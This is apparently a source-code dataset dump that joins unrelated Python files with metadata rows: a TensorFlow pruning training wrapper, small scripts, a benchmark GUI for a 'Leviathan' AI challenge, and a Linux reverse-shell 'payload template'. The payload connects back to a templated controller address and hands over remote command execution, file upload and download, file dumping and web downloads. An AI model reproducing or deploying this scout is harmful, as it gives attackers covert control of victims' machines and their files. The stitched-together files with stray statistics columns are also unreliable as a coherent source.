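# A minimal sanity check of the lattice-momentum helper defined above:
# the momentum at the lattice origin should vanish, since k = 0 there.
if __name__ == "__main__":
    _components, _theta = _calculateMomentaOpt(8, 1.0)
    print(_components[0, 0])  # -> [0. 0.], the zero-momentum point
    print(_theta.shape)       # -> (8, 8)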
| 37.314381
| 202
| 0.63691
| 17,357
| 0.777852
| 0
| 0
| 4,464
| 0.200054
| 0
| 0
| 12,468
| 0.558752
|
b1716479f1c26f49cf955c116938436d2e898588
| 21
|
py
|
Python
|
fastagram/tags/models/__init__.py
|
dobestan/fastagram
|
8c57401512d7621890a4f160d4b27c6e0d3ab326
|
[
"MIT"
] | 1
|
2016-03-27T10:36:01.000Z
|
2016-03-27T10:36:01.000Z
|
fastagram/tags/models/__init__.py
|
dobestan/django-101-fastagram
|
8c57401512d7621890a4f160d4b27c6e0d3ab326
|
[
"MIT"
] | 3
|
2016-03-25T05:32:39.000Z
|
2016-03-28T04:59:17.000Z
|
fastagram/tags/models/__init__.py
|
dobestan/django-101-fastagram
|
8c57401512d7621890a4f160d4b27c6e0d3ab326
|
[
"MIT"
] | 1
|
2016-03-28T16:35:36.000Z
|
2016-03-28T16:35:36.000Z
|
from .tag import Tag
| 10.5
| 20
| 0.761905
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b1724ba73246edc325129a0b1a56c982075f8024
| 8,346
|
py
|
Python
|
tensorflow/contrib/model_pruning/python/learning.py
|
uve/tensorflow
|
e08079463bf43e5963acc41da1f57e95603f8080
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/model_pruning/python/learning.py
|
uve/tensorflow
|
e08079463bf43e5963acc41da1f57e95603f8080
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/model_pruning/python/learning.py
|
uve/tensorflow
|
e08079463bf43e5963acc41da1f57e95603f8080
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Wrapper around tf-slim's training code contrib/slim/python/slim/learning.py
to support training of pruned models
*******************************************************************
* A simple working training script with support for model pruning *
*******************************************************************
# Load data and create the model:
images, labels = LoadData(...)
predictions = MyModel(images)
# Define the loss:
slim.losses.log_loss(predictions, labels)
total_loss = slim.losses.get_total_loss()
# Define the optimizer:
optimizer = tf.compat.v1.train.MomentumOptimizer(FLAGS.learning_rate,
FLAGS.momentum)
# Create the train_op
train_op = slim.learning.create_train_op(total_loss, optimizer)
# Parse pruning hyperparameters
pruning_hparams = pruning.get_pruning_hparams().parse(FLAGS.pruning_hparams)
# Create a pruning object using the pruning_hparams
p = pruning.Pruning(pruning_hparams)
# Add mask update ops to the graph
mask_update_op = p.conditional_mask_update_op()
# Run training.
learning.train(train_op,
my_log_dir,
mask_update_op)
see contrib/slim/python/slim/learning.py for additional examples
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import slim as _slim
_USE_DEFAULT = 0
train_step = _slim.learning.train_step
def train(train_op,
logdir,
mask_update_op,
train_step_fn=train_step,
train_step_kwargs=_USE_DEFAULT,
log_every_n_steps=1,
graph=None,
master='',
is_chief=True,
global_step=None,
number_of_steps=None,
init_op=_USE_DEFAULT,
init_feed_dict=None,
local_init_op=_USE_DEFAULT,
init_fn=None,
ready_op=_USE_DEFAULT,
summary_op=_USE_DEFAULT,
save_summaries_secs=600,
summary_writer=_USE_DEFAULT,
startup_delay_steps=0,
saver=None,
save_interval_secs=600,
sync_optimizer=None,
session_config=None,
trace_every_n_steps=None):
"""Wrapper around tf-slim's train function.
Runs a training loop using a TensorFlow supervisor.
When the sync_optimizer is supplied, gradient updates are applied
  synchronously. Otherwise, gradient updates are applied asynchronously.
Args:
train_op: A `Tensor` that, when executed, will apply the gradients and
return the loss value.
logdir: The directory where training logs are written to. If None, model
checkpoints and summaries will not be written.
mask_update_op: Operation that upon execution updates the weight masks and
thresholds.
train_step_fn: The function to call in order to execute a single gradient
      step. The function must take exactly four arguments: the current
session, the `train_op` `Tensor`, a global step `Tensor` and a
dictionary.
train_step_kwargs: A dictionary which is passed to the `train_step_fn`. By
default, two `Boolean`, scalar ops called "should_stop" and "should_log"
are provided.
log_every_n_steps: The frequency, in terms of global steps, that the loss
      and global step are logged.
graph: The graph to pass to the supervisor. If no graph is supplied the
default graph is used.
master: The address of the tensorflow master.
is_chief: Specifies whether or not the training is being run by the primary
replica during replica training.
global_step: The `Tensor` representing the global step. If left as `None`,
then slim.variables.get_or_create_global_step() is used.
number_of_steps: The max number of gradient steps to take during training,
as measured by 'global_step': training will stop if global_step is greater
than 'number_of_steps'. If the value is left as None, training proceeds
indefinitely.
init_op: The initialization operation. If left to its default value, then
the session is initialized by calling
`tf.compat.v1.global_variables_initializer()`.
init_feed_dict: A feed dictionary to use when executing the `init_op`.
local_init_op: The local initialization operation. If left to its default
value, then the session is initialized by calling
`tf.compat.v1.local_variables_initializer()` and
`tf.compat.v1.tables_initializer()`.
init_fn: An optional callable to be executed after `init_op` is called. The
callable must accept one argument, the session being initialized.
ready_op: Operation to check if the model is ready to use. If left to its
default value, then the session checks for readiness by calling
`tf.compat.v1.report_uninitialized_variables()`.
summary_op: The summary operation.
save_summaries_secs: How often, in seconds, to save summaries.
summary_writer: `SummaryWriter` to use. Can be `None` to indicate that no
summaries should be written. If unset, we create a SummaryWriter.
startup_delay_steps: The number of steps to wait for before beginning. Note
that this must be 0 if a sync_optimizer is supplied.
saver: Saver to save checkpoints. If None, a default one will be created and
used.
save_interval_secs: How often, in seconds, to save the model to `logdir`.
sync_optimizer: an instance of tf.compat.v1.train.SyncReplicasOptimizer, or
a list of them. If the argument is supplied, gradient updates will be
synchronous. If left as `None`, gradient updates will be asynchronous.
session_config: An instance of `tf.compat.v1.ConfigProto` that will be used
to configure the `Session`. If left as `None`, the default will be used.
trace_every_n_steps: produce and save a `Timeline` in Chrome trace format
and add it to the summaries every `trace_every_n_steps`. If None, no trace
information will be produced or saved.
Returns:
the value of the loss function after training.
Raises:
ValueError: if `train_op` is empty or if `startup_delay_steps` is
non-zero when `sync_optimizer` is supplied, if `number_of_steps` is
negative, or if `trace_every_n_steps` is not `None` and no `logdir` is
provided.
"""
def train_step_with_pruning_fn(sess, train_op, global_step,
train_step_kwargs):
total_loss, should_stop = train_step_fn(sess, train_op, global_step,
train_step_kwargs)
sess.run(mask_update_op)
return total_loss, should_stop
total_loss, _ = _slim.learning.train(
train_op,
logdir,
train_step_fn=train_step_with_pruning_fn,
train_step_kwargs=train_step_kwargs,
log_every_n_steps=log_every_n_steps,
graph=graph,
master=master,
is_chief=is_chief,
global_step=global_step,
number_of_steps=number_of_steps,
init_op=init_op,
init_feed_dict=init_feed_dict,
local_init_op=local_init_op,
init_fn=init_fn,
ready_op=ready_op,
summary_op=summary_op,
save_summaries_secs=save_summaries_secs,
summary_writer=summary_writer,
startup_delay_steps=startup_delay_steps,
saver=saver,
save_interval_secs=save_interval_secs,
sync_optimizer=sync_optimizer,
session_config=session_config,
trace_every_n_steps=trace_every_n_steps)
return total_loss
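# --- Hedged sketch (added; not part of the original source) ---
# The composition pattern used by train() above, in isolation: any callable
# with the slim train-step signature can be wrapped to run an extra op
# after each gradient step.
def _with_extra_op(step_fn, extra_op):
    def wrapped(sess, train_op, global_step, train_step_kwargs):
        total_loss, should_stop = step_fn(sess, train_op, global_step,
                                          train_step_kwargs)
        sess.run(extra_op)
        return total_loss, should_stop
    return wrapped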
| 42.581633
| 81
| 0.684999
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6,123
| 0.733645
|
b172a5ff4bd5c2830f5d2332f4e30cc2a061bc37
| 306
|
py
|
Python
|
run2.py
|
akuz/deep-gen-mnist
|
13d4d350a0dc9dc7f0111c839fb7158654f048c4
|
[
"MIT"
] | null | null | null |
run2.py
|
akuz/deep-gen-mnist
|
13d4d350a0dc9dc7f0111c839fb7158654f048c4
|
[
"MIT"
] | null | null | null |
run2.py
|
akuz/deep-gen-mnist
|
13d4d350a0dc9dc7f0111c839fb7158654f048c4
|
[
"MIT"
] | null | null | null |
import numpy as np
import tensorflow as tf
import model
if __name__ == "__main__":
print("Making level configs...")
level_configs = model.default_level_configs()
print("Making filter variables...")
filters = model.make_filters(tf.get_default_graph(), level_configs)
print("Done")
| 19.125
| 71
| 0.70915
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 69
| 0.22549
|
b17399bedc9351d3452e2254d35db67407d43d19
| 11,201
|
py
|
Python
|
payload_templates/lin_shell_payload.py
|
ahirejayeshbapu/python-shell
|
3560fe03f89557c1189255ca2737accdeda48faf
|
[
"MIT"
] | 4
|
2018-09-20T13:37:28.000Z
|
2022-02-23T00:36:55.000Z
|
payload_templates/lin_shell_payload.py
|
ahirejayeshbapu/python-shell
|
3560fe03f89557c1189255ca2737accdeda48faf
|
[
"MIT"
] | null | null | null |
payload_templates/lin_shell_payload.py
|
ahirejayeshbapu/python-shell
|
3560fe03f89557c1189255ca2737accdeda48faf
|
[
"MIT"
] | null | null | null |
import subprocess, os, socket, re, pickle, docx, urllib2
from platform import platform
from getpass import getuser
from time import sleep
from datetime import datetime
port = !!!!!
ip_addr = @@@@@
lkey = #####
End = $$$$$
skey = %%%%%
time_to_sleep = ^^^^^
type_of_scout = 'Command Shell'
try:
operating_sys = platform()
except:
operating_sys = '?????'
try:
hostname = socket.gethostname()
except:
hostname = '?????'
try:
username = getuser()
except:
username = '?????'
userinfo = hostname + '/' + username
scout_data = [skey, lkey, userinfo, type_of_scout, operating_sys]
shell_type = '/bin/bash'
s = None
help_menu = '''\nCommand Shell Menu
==================
Global Commands :
banner Display a banner
clear Clear the screen
help Show the help menu
local <shell command> Locally execute a shell command
python Enter the system python interpreter
quit Quit the framework
Connection commands :
disconnect Make the scout disconnect and try to reconnect
terminate Kill the scout process
sleep <seconds> Disconnect the scout and make it sleep for some time
Handler commands :
back Move back to scout handler
Command Shell Commands :
exec <shell command> Executes shell command and returns output
exec_file <shell command> Executes a shell command with no output(use this to run files and avoid blocking)
swap <shell path> Switch the type of shell used, default is "/bin/bash"
File Commands :
download <filepath> Download file
dump <filepath> Dump and view file content(supports .docx file)
upload <filepath> Upload a file
web_download <url> Download a file through a url\n'''
def basename(filepath):
basename = re.search(r'[^\\/]+(?=[\\/]?$)', filepath)
if basename:
return basename.group(0)
def recvall(tar_socket):
tar_socket.settimeout(None)
data = tar_socket.recv(9999)
if not data:
return ''
while True:
if data.endswith(End):
try:
tar_socket.settimeout(1)
more_data = tar_socket.recv(9999)
if not more_data:
return data[:-len(End)]
data += more_data
except (socket.timeout,socket.error):
tar_socket.settimeout(None)
return data[:-len(End)]
else:
more_data = tar_socket.recv(9999)
data += more_data
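# Note (added comment): recvall() implements simple delimiter framing --
# a message is complete once the buffer ends with the End marker; the short
# 1-second follow-up recv() catches back-to-back messages that happen to
# arrive in the same burst, before the marker is stripped off.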
def shell_execute(execute):
if execute[:3] == 'cd ':
try:
execute = execute.replace('cd ', '')
os.chdir(execute)
s.sendall("[+]Changed to directory : " + execute + End)
except:
s.sendall('[-]Could not change to directory : ' + execute + End)
else:
try:
result = subprocess.Popen(execute, shell=True, executable=shell_type, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
result = result.stdout.read() + result.stderr.read()
try:
s.sendall(unicode(result + End))
except:
s.sendall(result + End)
except:
s.sendall('[-]Could not execute command' + End)
def file_execute(command):
try:
result = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
s.sendall('[+]Executed : ' + command + End)
except Exception as e:
s.sendall('[-]Error executing, "' + command + '" : ' + str(e) + End)
def upload_file(file_name, content):
try:
f = open(basename(file_name), 'wb')
f.write(content)
f.close()
s.sendall('[+]Uploaded file successfully' + End)
except Exception as e:
s.sendall('[-]Error writing to file "' + file_name + '" : ' + str(e) + End)
def download_file(file_name):
if os.path.isfile(file_name):
try:
f = open(file_name, 'rb')
bin_data = f.read()
f.close()
s.sendall(file_name + '|/' + bin_data + End)
except Exception as e:
s.sendall('[-]Error reading from file "' + file_name + '" : ' + str(e) + End)
else:
s.sendall('[-]File path/name is not valid' + End)
def dump_file(file_name):
try:
if os.path.isfile(file_name):
            extension = basename(file_name).split('.')[-1]
if extension == 'docx':
try:
doc = docx.Document(file_name)
data = '\n\n'.join([paragraph.text.encode('utf-8') for paragraph in doc.paragraphs])
s.sendall(data + End)
except Exception as e:
s.sendall('[-]Error reading "' + file_name + '" : ' + str(e) + End)
else:
try:
f = open(file_name, 'rb')
data = f.read()
f.close()
try:
s.sendall(unicode(data + End))
except:
try:
s.sendall(data + End)
except Exception as e:
s.sendall('[-]Error dumping file "' + basename(file_name) + '" : ' + str(e) + End)
except Exception as e:
s.sendall('[-]Error reading "' + file_name + '" : ' + str(e) + End)
else:
s.sendall('[-]File path/name is not valid' + End)
except Exception as e:
s.sendall('[-]Error dumping file : ' + str(e) + End)
def download_from_web(url):
try:
url_data = url.split('/')[-1]
file_name = urllib2.unquote(url_data)
if file_name == '':
file_name = datetime.now().strftime("%Y%m%d-%H%M%S")
response = urllib2.urlopen(url)
data = response.read()
f = open(file_name, 'wb')
f.write(data)
f.close()
s.sendall('[+]Downloaded : ' + url + ' -> ' + file_name + End)
except Exception as e:
s.sendall('[-]Error downloading file : ' + str(e) + End)
def main():
global s, shell_type
while True:
while True:
try:
s = socket.socket()
s.connect((ip_addr, port))
break
except:
sleep(time_to_sleep)
continue
s.sendall(pickle.dumps(scout_data) + End)
while True:
try:
#s.settimeout(None)
data = recvall(s).split(' ', 1)
command = data[0]
if command == 'help':
s.sendall(help_menu + End)
elif command == 'disconnect':
s.sendall('[*]Disconnecting...' + End)
sleep(5)
break
elif command == 'terminate':
s.sendall('[*]Terminating scout...' + End)
os._exit(1)
elif command == 'sleep':
try:
sleep_time = int(data[1])
except:
s.sendall('[-]Please specify an integer as the sleep duration' + End)
continue
s.sendall('[*]Scout going offline for : ' + str(sleep_time) + ' seconds' + End)
s.shutdown(1)
s.close()
for i in range(sleep_time):
sleep(1)
break
elif command == 'exec':
try:
execute = data[1]
except:
s.sendall('[-]Specify a command to execute' + End)
continue
shell_execute(execute)
elif command == 'exec_file':
try:
execute = data[1]
except:
s.sendall('[-]Specify command/file to execute' + End)
continue
file_execute(execute)
elif command == 'swap':
try:
shell_type = data[1]
s.sendall('[+]Current shell in use is : '+shell_type+End)
except:
s.sendall('[-]Specify a shell type'+End)
elif command == 'download':
try:
file_name = data[1]
except:
s.sendall('[-]Specify file to download' + End)
continue
download_file(file_name)
elif command == 'upload':
data = data[1].split('|/', 1)
file_name = data[0]
file_contents = data[1]
upload_file(file_name, file_contents)
elif command == 'dump':
try:
file_target = data[1]
except:
s.sendall('[-]Specify file to dump contents of' + End)
continue
dump_file(file_target)
elif command == 'web_download':
try:
download_from_web(data[1])
except IndexError:
s.sendall('[-]Specify URL to download from' + End)
continue
except Exception as e:
s.sendall('[-]Error downloading from url : ' + str(e) + End)
continue
elif command == 'ping':
s.sendall('[+]Scout is alive' + End)
else:
s.sendall('[-]Unknown command "' + command + '", run "help" for help menu' + End)
except (socket.error, socket.timeout):
try:
s.shutdown(1)
s.close()
break
except socket.error:
break
except Exception as e:
try:
if command:
s.sendall('[-]Error, last run command : ' + command + '. Error message : ' + str(e) + End)
else:
s.sendall('[-]Error message : ' + str(e) + End)
except:
s.shutdown(1)
s.close()
break
main()
| 37.713805
| 130
| 0.44871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,741
| 0.24471
|
b17454e4938df93dd6729a10260ca6df34c9564c
| 84
|
py
|
Python
|
scripts/python/make-dist-cfg.py
|
brakmic/cm3
|
b99e280eca00c322e04e0586951de50108e51343
|
[
"BSD-4-Clause-UC",
"BSD-4-Clause",
"BSD-3-Clause"
] | 2
|
2015-03-02T17:01:32.000Z
|
2021-12-29T14:34:46.000Z
|
scripts/python/make-dist-cfg.py
|
ganeshbabuNN/cm3
|
9fb432d44a2ba89575febb38f7c1eb3dca6a3879
|
[
"BSD-4-Clause-UC",
"BSD-4-Clause",
"BSD-3-Clause"
] | 1
|
2015-07-23T07:51:22.000Z
|
2015-07-23T07:51:22.000Z
|
scripts/python/make-dist-cfg.py
|
RodneyBates/M3Devel
|
7b8dd3fc8f5b05d1c69774d92234ea50d143a692
|
[
"BSD-4-Clause-UC",
"BSD-4-Clause"
] | 1
|
2021-12-29T14:35:47.000Z
|
2021-12-29T14:35:47.000Z
|
#! /usr/bin/env python
from pylib import *
CopyConfigForDistribution(InstallRoot)
| 14
| 38
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 22
| 0.261905
|
b175213c84777ec0e61947cb929e05305bf328ad
| 17,813
|
py
|
Python
|
bench.py
|
citorva/verificateur_defis_leviathan
|
98cd7280253a541d94b34c120879556585ef814c
|
[
"CC0-1.0"
] | null | null | null |
bench.py
|
citorva/verificateur_defis_leviathan
|
98cd7280253a541d94b34c120879556585ef814c
|
[
"CC0-1.0"
] | null | null | null |
bench.py
|
citorva/verificateur_defis_leviathan
|
98cd7280253a541d94b34c120879556585ef814c
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pygame
import threading
import time
import math
import sys
import argparse
import bench_core
import multiprocessing
# Program colors. May be changed at any time
couleur_txt = (0xc0, 0xc0, 0xc0)  # Light grey for regular text
couleur_vic = (0x28, 0xa7, 0x45)  # Green for the gauge and its associated text
couleur_arp = (0x18, 0x18, 0x18)  # General application background (dark grey)
couleur_gar = (0x21, 0x21, 0x21)  # Gauge background in loading-bar mode (shade of the background)
couleurs_echec = [
    (0xf5, 0xe8, 0x00),  # Yellow to signal an exception (a crash of the algorithm)
    (0xff, 0x80, 0x3c),  # Orange to signal a pit (the character takes a ledge with a pit)
    (0xf7, 0x40, 0x3b),  # Red to signal the Leviathan (the character gets eaten by it)
    (0x7f, 0x7f, 0x7f),  # Grey to signal a lack of energy (i.e. the character goes in circles)
    (0xff, 0x00, 0x00)   # Bright red to signal no answer (the algorithm takes too long to respond)
]
# Text templates (user-facing strings, kept in French)
texte_modeles = [
"%0.00f%% à cause d'une exeption (%d, %d%% des échecs)%s",
"%0.00f%% tombé dans un puit (%d, %d%% des échecs)%s",
"%0.00f%% mangé par leviathan (%d, %d%% des échecs)%s",
"%0.00f%% par manque d'énergie (%d, %d%% des échecs)%s",
"%0.00f%% ne répondant pas (%d, %d%% des échecs)%s"
]
# Layout constants (metrics)
metrique_mm = 8   # Application margins (between the window edges and the content, and between elements)
metrique_hg = 24  # Gauge height in pixels
metrique_pt = 25  # Title text size in points
metrique_pp = 12  # Regular text size in points
# Benchmark variables (DO NOT MODIFY)
# UI control variables
affichage_absolu = False
arret_demande = False
# Time tracking
heure_depart = 0
heure_fin = 0
# pygame initialization (DO NOT MODIFY)
pygame.font.init()
pygame.display.init()
# Graphical element initialization (DO NOT MODIFY)
ecran = None
police_titre = pygame.font.Font(pygame.font.get_default_font(), metrique_pt)
police = pygame.font.Font(pygame.font.get_default_font(), metrique_pp)
def cree_jauge(surface, donnees, couleur, rect):
"""
Dessine une gauge en fonctions des données et couleurs fournis dans une boite défini par rect.
:param surface: La surface où dessiner la gauge
:param donnees: Les données de la gauge dans un tableau de taille N
:param couleur: Les couleurs associés aux données de la gauge dans un tableau de taille N
:param rect: La boite où dessiner la gauge (coordonnées + taille)
:return: None
"""
total_donnees = 0
nombre_donnees = len(donnees)
taille_elements = [0] * nombre_donnees
largeur_donnees = 0
for i in donnees:
total_donnees += i
for i in range(nombre_donnees - 1):
t = int(rect.width * donnees[i] / total_donnees)
taille_elements[i] = t
largeur_donnees += t
taille_elements[-1] = rect.width - largeur_donnees
largeur_donnees = 0
for i in range(nombre_donnees):
surface.fill(couleur[i], (rect.x + largeur_donnees, rect.y, taille_elements[i], rect.height))
largeur_donnees += taille_elements[i]
def rendu_temps(temps):
"""
Affiche l'ordre de grandeur du temps restant
:param temps: Le temps restant en secondes
:return: Un texte donnant son ordre de grandeur en jour/heures/minutes
"""
minutes = temps // 60 % 60
heures = temps // 3600 % 24
jours = temps // 86400
if jours != 0:
return "~%d jour%s" % (jours, "s" if jours != 1 else "")
if heures != 0:
return "~%d heure%s" % (heures, "s" if heures != 1 else "")
if minutes != 0:
return "~%d minute%s" % (minutes, "s" if minutes != 1 else "")
return "<1 minute"
def format_duree(duree):
"""
Formate une durée en ensemble jours/heure/minutes/secondes
Cette durée formaté n'affiche pas les ordres de grandeurs nuls
:param duree: La durée à formater
:return: Le texte de la durée formaté sour le format <j>j <hh>h <mm>min <ss>s
"""
duree = int(math.floor(duree))
return "{}{:02d}s".format(
"{}{:02d}min".format(
"{}{:02d}h".format(
"{}j".format(duree // 86400) if duree // 86400 != 0 else "",
duree // 3600 % 24
) if duree // 3600 != 0 else "",
duree // 60 % 60
) if duree // 60 != 0 else "",
duree % 60
)
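# Example (added; not in the original source): format_duree(3723) returns
# "01h02min03s", and format_duree(59) returns "59s" (zero fields are omitted).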
def afficher_graine(graine):
"""
Formate un texte avec la graine donnée ou ne donner rien si cette dernière est None
:param graine: La graine à afficher
:return: Un texte sous la forme ". Graine aléatoire: <graine>" si seed différent de None sinon ""
"""
if graine is None:
return ""
else:
return ". Graine aléatoire: %d" % graine
# TODO: Clean up and document this function
def affichage_donnees():
# temps_restant = math.ceil(args.max_duration - temps_exec_unitaire)
duree = time.time() - heure_depart
total_tst = bench.total_compteur
temps_exec = duree * (args.number / total_tst - 1)
score = (1000 * (bench.compteur[bench_core.PARAMETRE_TOTAL_REUSSITE] - 2 * bench.compteur[bench_core.PARAMETRE_ECHEC_NON_REPONSE] - bench.compteur[bench_core.PARAMETRE_ECHEC_EXEPTION] // 2) - bench.trajet_moyen) * args.web_dim / total_tst
largeur = 512
hauteur = metrique_mm
texte_compteur = police_titre.render(
"Simulation %d sur %d (%0.00f%%)" % (total_tst, args.number, 100. * float(total_tst) / float(args.number)),
True, couleur_txt)
largeur = max(largeur, texte_compteur.get_width())
hauteur += texte_compteur.get_height() + metrique_mm
texte_score = police.render("Score: %d" % score, True, couleur_txt)
largeur = max(largeur, texte_score.get_width())
hauteur += texte_score.get_height() + metrique_mm
texte_victoire = police.render(
"%0.00f%% de victoires (%d). Trajet moyen: %d" % (
100 * bench.compteur[bench_core.PARAMETRE_TOTAL_REUSSITE] / total_tst, bench.compteur[bench_core.PARAMETRE_TOTAL_REUSSITE], bench.trajet_moyen),
True, couleur_vic)
largeur = max(largeur, texte_victoire.get_width())
hauteur += texte_victoire.get_height() + metrique_mm
# texte_temps_annulation = None
texte_temps_restant = None
if total_tst != args.number:
texte_temps_restant = police.render(
"Temps restant: %s. Écoulé %s" % (rendu_temps(math.ceil(temps_exec)), format_duree(duree)), True,
couleur_txt)
# texte_temps_annulation = police.render("Temps restant avant annulation: %d seconde%s" % (
# temps_restant if temps_restant > 0 else 0, "s" if temps_restant > 1 else ""), True,
# couleur_txt if temps_restant > 5 else couleur_lvt)
else:
texte_temps_restant = police.render("Tests effectués en %s" % (format_duree(heure_fin - heure_depart)), True,
couleur_vic)
# texte_temps_annulation = police.render("", True, couleur_txt)
# largeur = max(largeur, texte_temps_annulation.get_width())
# hauteur += texte_temps_annulation.get_height() + metrique_mm
largeur = max(largeur, texte_temps_restant.get_width())
hauteur += texte_temps_restant.get_height() + metrique_mm
texte_echec = []
valeur_gauge = [bench.compteur[bench_core.PARAMETRE_TOTAL_REUSSITE]]
couleur_gauge = [couleur_vic]
for i in range(5):
if bench.compteur[i] != 0:
texte_echec.append(
police.render(
texte_modeles[i] % (
100 * bench.compteur[i] / total_tst,
bench.compteur[i],
100 * bench.compteur[i] / bench.total_ech,
afficher_graine(bench.graines[i])
),
True, couleurs_echec[i]
)
)
valeur_gauge.append(bench.compteur[i])
couleur_gauge.append(couleurs_echec[i])
if affichage_absolu:
valeur_gauge.append(args.number - total_tst)
couleur_gauge.append(couleur_gar)
for i in texte_echec:
hauteur += i.get_height() + metrique_mm
largeur = max(largeur, i.get_width())
hauteur += metrique_hg + metrique_mm
largeur += 2 * metrique_mm
surface = pygame.Surface((largeur, hauteur))
surface.fill(couleur_arp)
y = metrique_mm
surface.blit(texte_compteur, (
largeur / 2 - texte_compteur.get_width() / 2, y, texte_compteur.get_width(), texte_compteur.get_height()))
y += texte_compteur.get_height() + metrique_mm
surface.blit(texte_score,
(largeur / 2 - texte_score.get_width() / 2, y, texte_score.get_width(), texte_score.get_height()))
y += texte_score.get_height() + metrique_mm
cree_jauge(surface, valeur_gauge, couleur_gauge,
pygame.Rect(metrique_mm, y, largeur - 2 * metrique_mm, metrique_hg))
y += metrique_hg + metrique_mm
surface.blit(texte_temps_restant, (
largeur / 2 - texte_temps_restant.get_width() / 2, y, texte_temps_restant.get_width(),
texte_temps_restant.get_height()))
y += texte_temps_restant.get_height() + metrique_mm
surface.blit(texte_victoire, (metrique_mm, y, texte_victoire.get_width(), texte_victoire.get_height()))
y += texte_victoire.get_height() + metrique_mm
for i in texte_echec:
surface.blit(i, (metrique_mm, y, i.get_width(), i.get_height()))
y += i.get_height() + metrique_mm
# surface.blit(texte_temps_annulation, (
# largeur / 2 - texte_temps_annulation.get_width() / 2, y, texte_temps_annulation.get_width(),
# texte_temps_annulation.get_height()))
return surface
def fonction_affichage():
"""
Routine d'affichage. Cette fonction tourne dans un thread indépendant
:return: None
"""
global arret_demande, affichage_absolu, ecran, heure_fin
temps_mise_a_jour = 0
duree_mise_a_jour = 1/args.update_frequency
debut_clic = False
while not arret_demande:
if time.time() - temps_mise_a_jour >= duree_mise_a_jour:
bench.mise_a_jour_donnees()
if bench.total_compteur != 0:
if bench.total_compteur < args.number:
heure_fin = time.time()
surface = affichage_donnees()
if ecran is None or surface.get_width() != ecran.get_width() or surface.get_height() != ecran.get_height():
ecran = pygame.display.set_mode((surface.get_width(), surface.get_height()))
ecran.blit(surface, (0, 0, ecran.get_width(), ecran.get_height()))
pygame.display.flip()
temps_mise_a_jour = time.time()
if ecran is not None:
for event in pygame.event.get():
if event.type == pygame.QUIT:
bench.arret()
arret_demande = True
elif event.type == pygame.MOUSEBUTTONDOWN:
debut_clic = True
elif event.type == pygame.MOUSEBUTTONUP and debut_clic:
affichage_absolu = not affichage_absolu
debut_clic = False
# Object managing the AI benchmark
bench = None
# Parsing of execution options
parser = argparse.ArgumentParser(
description="Effectue de nombreux tests dans le but de vérifier le comportement de l'IA pour le défi python "
"du Leviathan dans des cas aléatoires. Voir "
"https://tiplanet.org/forum/viewtopic.php?f=49&t=24387&p=257174#p257172 pour plus d'informations "
"sur le défi."
)
# Argument for the artificial intelligence
parser.add_argument("ia", help="Fichier de l'IA à tester")
parser.add_argument('-n', "--number", default=100000, type=int, help="Nombre de tests à effectuer")
parser.add_argument('-s', "--seed", default=0xc0ffee, type=int, help="Graine aléatoire du benchmark")
parser.add_argument('-w', "--web-dim", default=36, type=int, help="Nombre de corniches")
parser.add_argument("-d", "--web-density", default=0.05, type=float,
help="Densité moyenne de voisine à chaque corniche")
parser.add_argument("-b", "--bats-density", default=0.1, type=float, help="Densité de chauve souris par parties")
parser.add_argument("-p", "--pit-density", default=0.15, type=float, help="Densité de puit par parties")
parser.add_argument("-m", "--max-duration", default=20, type=float, help="Durée maximum d'une partie en seconde")
parser.add_argument("-t", "--threads", default=1, type=int, help="Nombre de fils d'exécution pour les tests")
parser.add_argument("-f", "--update-frequency", default=24, type=int, help="Fréquence de rafraichssement de l'interface")
args = parser.parse_args(sys.argv[1:])
err = False
err_text = "\n"
if args.web_density >= 1 or args.web_density <= 0:
err_text += "La densité de corniche voisine doit être comprise entre 0 et 1, non inclu\n"
err = True
if args.bats_density >= 1 or args.bats_density <= 0:
err_text += "La densité de chauve souris doit être comprise entre 0 et 1, non inclu\n"
err = True
if args.pit_density >= 1 or args.pit_density <= 0:
err_text += "La densité de puit doit être comprise entre 0 et 1, non inclu\n"
err = True
if args.max_duration <= 0:
err_text += "La durée maximum d'une partie doit être strictement supérieure à 0\n"
err = True
if args.threads <= 0:
err_text += "Le nombre de fils d'exécution doit être supérieur à 0\n"
err = True
if args.web_dim <= 3:
err_text += "Un nombre raisonnable de corniche doit être fourni pour le bon fonctionnement de l'algorithme\n"
err = True
if args.number <= 0:
err_text += "Il faut au minimum un test pour pouvoir avoir des données exploitables\n"
err = True
if args.update_frequency <= 0:
err_text += "La fréquence de rafraichissement de l'interface doit être strictement positive"
err = True
if args.update_frequency > 60:
print("Alerte: La fréquence de rafraichissement choisi est très élevée. Cela pourra impacter négativement la vitesse du test")
if args.threads >= multiprocessing.cpu_count():
print("Alerte: Le nombre de fils d'exécution demandé est supérieur au nombre de processeurs disponibles. Cela risque d'impacter les performance totales de votre ordinateur")
"""
try:
bench = bench_core.Bench(
args.threads,
args.seed,
args.number,
args.ia,
args.max_duration,
args.web_dim,
args.web_density,
args.pit_density,
args.bats_density
)
except Exception as _:
err_text += "L'ia spécifié ne peut être ouvert en tant que script. Il se peut que ce dernier n'existe pas ou ne " \
"soit pas un script python valide\n"
err = True
"""
bench = bench_core.Bench(
args.threads,
args.seed,
args.number,
args.ia,
args.max_duration,
args.web_dim,
args.web_density,
args.pit_density,
args.bats_density
)
if err:
parser.print_usage()
print(err_text)
quit()
del parser
